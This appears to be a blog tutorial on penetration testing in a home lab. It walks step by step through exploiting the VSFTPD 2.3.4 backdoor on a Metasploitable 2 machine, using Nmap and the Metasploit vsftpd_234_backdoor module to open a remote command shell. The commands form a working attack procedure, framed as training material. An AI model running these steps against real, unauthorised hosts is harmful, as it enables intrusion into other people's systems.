Exploiting VSFTPD 2.3.4 Backdoor on Metasploitable 2 Using Kali Linux (Step-by-Step Guide)

Leave a Comment / Tech
Exploiting Metasploitable 2 With Kali Linux Step By Step

Introduction

If you’re learning penetration testing or ethical hacking, practicing in a controlled lab environment is essential. One of the most popular intentionally vulnerable machines used for cybersecurity training is Metasploitable 2.

In this tutorial, we will demonstrate how to exploit the VSFTPD 2.3.4 backdoor vulnerability using Kali Linux and the Metasploit Framework.

This guide will walk through the complete process, including:

  • Identifying the target machine
  • Scanning services using Nmap
  • Finding exploits in Metasploit
  • Exploiting the VSFTPD backdoor vulnerability

⚠️ Important: This tutorial is intended for educational purposes only and should only be performed in a controlled lab environment.

Prefer Video? Watch the Full Walkthrough

If you prefer watching the exploitation process step-by-step, you can view the full video tutorial below.

What is the VSFTPD 2.3.4 Backdoor Vulnerability?

VSFTPD (Very Secure FTP Daemon) is a widely used FTP server for Linux systems. In 2011, version 2.3.4 was discovered to contain a malicious backdoor that had been inserted into the source code during a supply-chain compromise.

When a specially crafted username containing a smiley face (:)) is used during authentication, the backdoor opens a command shell on port 6200, allowing remote attackers to gain access to the system.

Because of this vulnerability, VSFTPD 2.3.4 is commonly included in penetration testing labs such as Metasploitable 2.

Security professionals often practice exploiting this vulnerability to understand:

  • service enumeration
  • vulnerability discovery
  • exploitation techniques using Metasploit
Lab Environment Setup

To follow along with this tutorial, you need a small penetration testing lab.

Attacker Machine
Target Machine

Both machines should be connected to the same virtual network (Host-Only or NAT Network).

Recommended Hardware for a Home Cybersecurity Lab

If you’re planning to build a cybersecurity practice lab at home, running virtual machines smoothly requires enough RAM and storage.

Recommended minimum:

  • 16GB RAM
  • SSD storage
  • Virtualization support

Recommended Lab Hardware

Step 1: Identify the Target IP Address

The first step is identifying the IP address of the Metasploitable machine.

Open a terminal in Kali Linux and run:

ifconfig

Locate your active network interface and identify the IP address range of your network.

Your Metasploitable machine will typically be within the same subnet.

Example target IP:

192.168.56.101

Step 2: Scan the Target Using Nmap

Next, perform a service version scan to identify open ports and running services.

Run the following command:

nmap -sV 192.168.56.101

Explanation:

  • -sV enables service version detection
  • This helps identify potentially vulnerable software

Example scan result:

21/tcp open ftp vsftpd 2.3.4

This indicates that the FTP server VSFTPD 2.3.4 is running on port 21.

Since this version contains a known backdoor vulnerability, it becomes a potential exploitation target.

Step 3: Start Metasploit Framework

Now launch the Metasploit Framework.

msfconsole

Metasploit is a powerful penetration testing platform that includes thousands of exploit modules for known vulnerabilities.

Step 4: Search for the VSFTPD Exploit

Inside Metasploit, search for the exploit module related to VSFTPD.

search vsftpd

You should see a module similar to:

exploit/unix/ftp/vsftpd_234_backdoor

This module targets the known backdoor vulnerability present in VSFTPD version 2.3.4.

Step 5: Load the Exploit Module

Select the exploit module using the following command:

use exploit/unix/ftp/vsftpd_234_backdoor

Next, display the required options:

show options

Set the target IP address:

set RHOSTS 192.168.56.101
Step 6: Run the Exploit

Execute the exploit:

exploit

If the attack is successful, Metasploit will open a command shell session.

Example output:

Command shell session opened

You can now run commands on the target machine.

Example

whoami

This confirms that you have gained shell access to the system.

Build Your Own Cybersecurity Home Lab

Practicing penetration testing safely requires a proper lab environment.

If you want to build your own cybersecurity lab, read the full guide here:

How to Build a Beginner Cybersecurity Home Lab

This guide explains:

  • virtualization setup
  • recommended hardware
  • installing Kali Linux
  • running vulnerable machines safely

Frequently Asked Questions

Is exploiting Metasploitable 2 legal?

Yes. Metasploitable is intentionally vulnerable and designed for cybersecurity training.

However, exploiting systems without permission is illegal.

What is Metasploitable used for?

Metasploitable is commonly used for learning:

  • penetration testing
  • vulnerability exploitation
  • ethical hacking techniques
  • network security testing
What tools are used in this tutorial?

This tutorial uses several standard penetration testing tools:

  • Kali Linux
  • Nmap
  • Metasploit Framework
  • Metasploitable 2

These tools are widely used by cybersecurity professionals.

Conclusion

In this tutorial, we demonstrated how to exploit the VSFTPD 2.3.4 backdoor vulnerability on Metasploitable 2 using Kali Linux and Metasploit.

Key steps covered:

  • identifying the target machine
  • scanning services using Nmap
  • finding exploit modules in Metasploit
  • exploiting the VSFTPD backdoor vulnerability

Practicing in vulnerable lab environments like Metasploitable helps cybersecurity students understand real-world attack techniques and defensive strategies.

Always remember to practice ethical hacking only in authorized environments.

Leave a Comment

Your email address will not be published. Required fields are marked *